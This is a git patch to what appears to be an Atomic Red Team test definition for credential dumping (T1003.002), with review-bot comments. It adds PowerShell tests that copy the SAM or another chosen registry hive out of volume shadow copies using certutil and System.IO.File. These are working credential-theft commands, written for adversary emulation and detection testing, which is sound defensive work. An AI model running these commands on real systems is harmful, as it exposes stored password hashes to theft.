From ddeb15ae41913d66c6b104c0807ee4a5e7d1ed8c Mon Sep 17 00:00:00 2001
From: Brandon Morgan
Date: Mon, 9 Aug 2021 11:07:00 -0500
Subject: [PATCH] Update T1003.002.yaml (#1595)

Added test 6 to dump hives with System.IO.File. Also tweaked test 5 so that the hive could be selected by the user, same as in test 6
---
 atomics/T1003.002/T1003.002.yaml | 52 +++++++++++++++++++++++++++-----
 1 file changed, 45 insertions(+), 7 deletions(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index d2efab7b..db4530ac 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -99,19 +99,23 @@ atomic_tests:
     name: powershell
     elevation_required: true
 
-- name: dump volume shadow copy hive with certutil
+- name: dump volume shadow copy hives with certutil
   auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
   description: |
-    Dump the SAM hive from volume shadow copies with the certutil utility
+    Dump hives from volume shadow copies with the certutil utility
     This can be done with a non-admin user account
   supported_platforms:
   - windows
   input_arguments:
-    file_path:
+    dump_path:
       description: Path where the hive will be dumped
       type: Path
       default: $ENV:temp
-    file_name:
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
       description: Name of the dumped hive
       type: String
       default: myhive
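Review bot: Renaming the input arguments `file_path`/`file_name` to `dump_path`/`dumped_hive` is not required for the new `target_hive` option and silently breaks any existing invocation that passes the old argument names; either keep the old names or call the rename out in the test description. The `target_hive` description should also say what the value is, since the next hunk splices it straight into a file path under the config directory: `description: Name of the hive file under Windows\System32\config to copy (e.g. SAM or SYSTEM)`.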
@@ -121,11 +125,45 @@ atomic_tests:
       $shadowlist = get-wmiobject win32_shadowcopy
       $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
       $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-      certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
     name: powershell
     elevation_required: false
     cleanup_command: |
       write-host ""
-      $toremove = #{file_path} + "\" + '#{file_name}'
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
       rm $toremove
+
+- name: dump volume shadow copy hives with System.IO.File
+  description: |
+    Dump hives from volume shadow copies with System.IO.File
+  supported_platforms:
+  - windows
+  input_arguments:
+    dump_path:
+      description: Path where the hive will be dumped
+      type: Path
+      default: $ENV:temp
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
+      description: Name of the dumped hive
+      type: String
+      default: myhive
+  executor:
+    command: |
+      write-host ""
+      $shadowlist = get-wmiobject win32_shadowcopy
+      $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+      $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+      [System.IO.File]::Copy($shadowpath , $mydump)
+    name: powershell
+    elevation_required: false
+    cleanup_command: |
+      write-host ""
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+      rm $toremove
\ No newline at end of file
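Review bot: `$mydump = #{dump_path} + '\' + '#{dumped_hive}'` in the new test only parses because the default `$ENV:temp` happens to be a PowerShell expression; the argument is substituted unquoted, so a literal path such as `C:\Temp` would not be a valid expression, and the two `$toremove` cleanup lines have the same shape. Building the path as `$mydump = Join-Path "#{dump_path}" "#{dumped_hive}"` (and likewise for `$toremove`) accepts both the `$ENV:temp` default and a literal path. `[System.IO.File]::Copy($shadowpath , $mydump)` also throws when the destination already exists, unlike the `certutil -f` call in test 5, so a rerun after a failed cleanup fails; passing `$true` as the third argument overwrites instead. The new test has no `auto_generated_guid` and its description omits test 5's note that it runs as a non-admin user; the GUID is presumably filled in by the project's tooling, but the description sentence should be carried over.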